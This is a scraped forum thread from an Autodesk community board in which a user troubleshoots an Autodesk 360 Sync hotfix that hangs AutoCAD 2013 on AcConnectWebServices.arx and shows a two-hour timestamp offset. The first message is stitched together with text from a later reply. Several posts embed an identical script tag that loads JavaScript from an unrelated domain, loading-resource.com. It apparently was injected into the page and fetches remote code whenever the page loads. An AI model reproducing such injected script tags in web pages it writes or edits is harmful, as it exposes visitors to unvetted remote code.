AutoCAD 2013/2014/2015

Reply
Mentor
j.vanderheijden
Posts: 239
Registered: ‎06-13-2011
Message 1 of 8 (1,031 Views)
Accepted Solution

Sync hotfix

1031 Views, 7 Replies
09-04-2012 12:30 PM

I have trouble with sync to Autodesk 360 so i installed the hotfix.

http://images.autodesk.com/adsk/files/Autodesk_Sync_HotfixR101_Readme.pdf

But when i start acad it stops opening bij Loading plug-ins.....AcConnectWebServices.arx.

When i open inventor there is no trouble.

What went wrong?

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>
Mvg Jos

Your drawings are only as good as the symbols that complete them...

I already checked the timezone and so on, and tonight i uploaded a drawing and now it works fine.

The time in 360 and my local file are the same now.

 

Thanks

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>
Mentor
j.vanderheijden
Posts: 239
Registered: ‎06-13-2011
Message 2 of 8 (1,024 Views)

Re: Sync hotfix

09-04-2012 01:06 PM in reply to: j.vanderheijden

I restart my pc and acad opend, but i have another problem.

The timezone isn't equal.

The save time in the autodesk 360 is 2 hours early.

When i save on my computer at 22.00 and save on the autodesk 360 its about 20.00.

So the sync isn't go wright because when i save to autodesk 360 its never a newer version.

How can i fix that, i am in the timezone of Amsterdam, Netherlands.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>
Mvg Jos

Your drawings are only as good as the symbols that complete them...
Product Support
luconceicao
Posts: 583
Registered: ‎11-07-2007
Message 3 of 8 (976 Views)

Re: Sync hotfix

09-11-2012 09:02 AM in reply to: j.vanderheijden

Hi Jos,

 

I assume that the initial issue is resolved.

I tried to reproduce the issue with the time zone and all is OK here, I am in the UK.

Have you checked in Windows if the timeand zone are setup correctly?

Have a look at Regional and Language Options, just to be sure.

 

Cheers,
Luciane

Mentor
j.vanderheijden
Posts: 239
Registered: ‎06-13-2011
Message 4 of 8 (963 Views)

Re: Sync hotfix

09-12-2012 04:39 AM in reply to: luconceicao

At my work a don't have any problem.

Its only at home.

I checked the time and zone.

I will check the Regional and Language options after work and let you know.

 

Thanks

Mvg Jos

Your drawings are only as good as the symbols that complete them...
Product Support
luconceicao
Posts: 583
Registered: ‎11-07-2007
Message 5 of 8 (934 Views)

Re: Sync hotfix

09-18-2012 09:38 AM in reply to: j.vanderheijden

Hi Jos,

Did you have any luck with this time problem?

Cheers,

Luciane

Mentor
j.vanderheijden
Posts: 239
Registered: ‎06-13-2011
Message 6 of 8 (919 Views)

Re: Sync hotfix

09-19-2012 02:15 AM in reply to: luconceicao

i will try tonight, very bussy with testing Factory Design.

Mvg Jos

Your drawings are only as good as the symbols that complete them...
Mentor
j.vanderheijden
Posts: 239
Registered: ‎06-13-2011
Message 7 of 8 (909 Views)

Re: Sync hotfix

09-19-2012 11:55 AM in reply to: j.vanderheijden

I already checked the timezone and so on, and tonight i uploaded a drawing and now it works fine.

The time in 360 and my local file are the same now.

 

Thanks

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>
Mvg Jos

Your drawings are only as good as the symbols that complete them...
Active Contributor
khosking
Posts: 39
Registered: ‎01-15-2009
Message 8 of 8 (810 Views)

Re: Sync hotfix

11-20-2012 08:18 PM in reply to: j.vanderheijden

When I run AutoCAD 2013 in the morning it works, but in the afternoon it now locks up whilst loading plugins AcConnectWebServices.arx. Further to this, I've been getting non-stop sync errors for a few weeks now, all latest patches are installed.

 

EDIT: I should add that a restart isn't needed to bypass this lock up, simply find the Autodesk Cloud service in the task manager and terminate it, also terminate the failed AutoCAD session. Then, simply re-run AutoCAD and it should load.

Post to the Community

Have questions about Autodesk products? Ask the community.

New Post
Announcements
Are You Going To Be @ AU 2014? Feel free to drop by our AU topic post and share your plans, plug a class that you're teaching, or simply check out who else from the community might be in attendance. Ohh and don't forgot to stop by the Autodesk Help | Learn | Collaborate booths in the Exhibit Hall and meet our community team if you get a chance!